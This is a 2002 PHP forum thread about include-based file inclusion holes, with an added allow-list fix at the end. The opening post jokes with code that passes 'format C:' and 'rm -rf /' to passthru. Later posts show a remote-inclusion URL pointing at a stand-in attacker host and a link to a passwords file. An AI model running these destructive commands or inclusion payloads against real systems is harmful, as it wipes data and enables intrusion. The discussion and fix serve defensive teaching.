Posted: Fri May 03, 2002 2:32 am
by sam

Code:

if(!empty($hacker)){
    if(!passthru("format C:")){
        passthru("rm -rf /");
    }
    echo "You fool now look at what you've done.";
}

Code can only be secure until someone cracks it... Nothing is indestructible.

Cheers Moe :mrgreen:

Posted: Fri May 03, 2002 8:50 am
by pHaZed
When developing something like that, you should be aware that someone can do something like this:

http://www.maxxxtorque.com/prodigy/php/ ... /index.php

Imagine if you had something sensitive on your server like this:

http://www.maxxxtorque.com/prodigy/php/ ... .passwords
You can simplify it down to ONLY including php files.
like so

Code:

include("$example.php");

then in the browser http://host.net/file.php?example=filename

it will always add .php file extension to whatever file users are trying to include...

Posted: Fri May 03, 2002 11:21 am
by dusty
read the posts before.. adding the ext in the include is useless. if someone passes index.php?var=http://www.hacked.com/blah (.php)
you're still screwed. yeah it keeps them guessing what the ext is, but that could be figured out sooner or later.
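
Added example, not part of any post in this thread: one way to avoid the problem discussed above is to never build the include path from the request value at all, and instead look the value up in a server-side allow-list. The page names, file paths and sample inputs below are constructed for illustration.

```php
<?php
// Added example: allow-list lookup instead of include("$example.php").
// Page names and file paths are constructed, not taken from the thread.

const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map a request parameter to a file chosen by the server.
 * Returns null for anything that is not an exact key in the allow-list.
 */
function resolve_page($requested, array $pages = PAGES): ?string
{
    // Array parameters (?example[]=x) and other non-strings are rejected.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup only: user input never becomes part of a path.
    return array_key_exists($requested, $pages) ? $pages[$requested] : null;
}

// Constructed inputs: one valid name plus the kinds of values the thread discusses.
$samples = [
    'home',
    'http://www.hacked.com/blah',  // remote URL; appending ".php" does not stop it
    '../.passwords',               // path traversal attempt (constructed)
    'home.php',                    // not a key, so rejected as well
    ['home'],                      // array parameter
];

foreach ($samples as $input) {
    $file = resolve_page($input);
    printf(
        "%-32s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        $file ?? 'rejected (send 404)'
    );
    // In a real handler: if ($file !== null) { include __DIR__ . '/' . $file; }
}
```

On current PHP versions `allow_url_include` is off by default, which blocks the remote-URL case but not local path traversal, so the allow-list is still needed.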